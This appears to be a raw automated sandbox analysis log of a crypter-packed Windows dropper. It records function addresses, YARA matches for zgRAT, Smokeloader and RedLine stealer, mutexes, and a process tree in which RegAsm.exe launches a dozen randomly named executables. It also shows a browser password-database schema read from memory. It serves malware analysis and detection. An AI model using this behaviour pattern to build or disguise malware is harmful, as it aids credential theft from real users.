                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004072B212_2_004072B2
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041B34712_2_0041B347
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041935412_2_00419354
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040A37412_2_0040A374
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040931612_2_00409316
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040632012_2_00406320
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040632112_2_00406321
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004063C412_2_004063C4
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004093D812_2_004093D8
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040838B12_2_0040838B
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004063AB12_2_004063AB
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004063B812_2_004063B8
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040940A12_2_0040940A
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041B41F12_2_0041B41F
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040942F12_2_0040942F
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040856812_2_00408568
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004095DE12_2_004095DE
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004215E512_2_004215E5
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040964712_2_00409647
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A66B12_2_0041A66B
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A60F12_2_0041A60F
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040562712_2_00405627
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040863212_2_00408632
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041B6D812_2_0041B6D8
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004096DC12_2_004096DC
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004096E112_2_004096E1
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041669612_2_00416696
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004086A712_2_004086A7
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040976E12_2_0040976E
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040977612_2_00409776
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040870C12_2_0040870C
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004087C112_2_004087C1
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040D7CD12_2_0040D7CD
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040D7E712_2_0040D7E7
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040D7F212_2_0040D7F2
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040D7FB12_2_0040D7FB
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040984512_2_00409845
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A85412_2_0041A854
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040986A12_2_0040986A
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041781F12_2_0041781F
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004098C512_2_004098C5
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004098FB12_2_004098FB
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A89712_2_0041A897
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040794512_2_00407945
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041690112_2_00416901
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041691812_2_00416918
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A93C12_2_0041A93C
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004099AA12_2_004099AA
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00407A6612_2_00407A66
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416A0312_2_00416A03
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409A0412_2_00409A04
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416A1912_2_00416A19
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409A3212_2_00409A32
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409A3B12_2_00409A3B
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409ADE12_2_00409ADE
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00407A8112_2_00407A81
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416B6412_2_00416B64
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00407B2412_2_00407B24
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00407B3312_2_00407B33
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409BC312_2_00409BC3
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00407BC812_2_00407BC8
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409BE812_2_00409BE8
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409B9112_2_00409B91
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00407B9512_2_00407B95
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00407BB512_2_00407BB5
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040BBB612_2_0040BBB6
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00417C0112_2_00417C01
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040BC8012_2_0040BC80
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00418CB112_2_00418CB1
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041AD8D12_2_0041AD8D
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409E7E12_2_00409E7E
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416E1812_2_00416E18
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00406EFD12_2_00406EFD
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040DE8612_2_0040DE86
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409EA312_2_00409EA3
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416F6412_2_00416F64
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416F7512_2_00416F75
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416F0D12_2_00416F0D
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00409F1512_2_00409F15
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416FCA12_2_00416FCA
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416FDB12_2_00416FDB
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416FEA12_2_00416FEA
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00405FF112_2_00405FF1
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416F8612_2_00416F86
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416F9712_2_00416F97
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416FA812_2_00416FA8
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00405FB512_2_00405FB5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Security
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0053F880 appears 39 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004172E0 appears 53 times
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: String function: 00502A87 appears 39 times
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: String function: 004FEDB6 appears 70 times
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: String function: 005029F6 appears 99 times
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: String function: 00502A53 appears 375 times
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6948 -ip 6948
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000000.1502568521.0000000000C94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemazda.exe0 vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1509746400.0000000002F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePE.dll& vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1509897036.0000000004B1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePDFReader.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 0000002B.00000002.2943867641.0000000002A61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                        Source: 00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                        Source: 00000009.00000002.2601921421.000000000283E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000009.00000002.2601604235.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000009.00000002.2601573090.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                        Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.2f50000.0.raw.unpack, Ca01BQGh9DxiBOJwup.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.2f50000.0.raw.unpack, Ca01BQGh9DxiBOJwup.csCryptographic APIs: 'CreateDecryptor'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@96/142@11/18
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_028504FA CreateToolhelp32Snapshot,Module32First,9_2_028504FA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00433600 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,VariantClear,CoUninitialize,3_2_00433600
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.logJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\KejwopdnfWW_15
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2240:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1708
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeMutant created: \Sessions\1\BaseNamedObjects\IntelPowerEExpert
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6948
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4700:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1876:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:2840:64:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2796
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:120:WilError_03
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile created: C:\Users\user\AppData\Local\Temp\service123.exeJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeFile opened: C:\Windows\system32\ac67957baa5d8bac961bbe73ad1250951f27f5252edaa4dc163b5969c95a7accAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000003.2080307538.00000000031E5000.00000004.00000020.00020000.00000000.sdmp, kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000003.2104355772.00000000031E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeReversingLabs: Detection: 71%
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeVirustotal: Detection: 42%
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exeString found in binary or memory: /addr_imp
                        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exe C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exe C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exe C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exe C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exe C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exe
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6948 -ip 6948
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
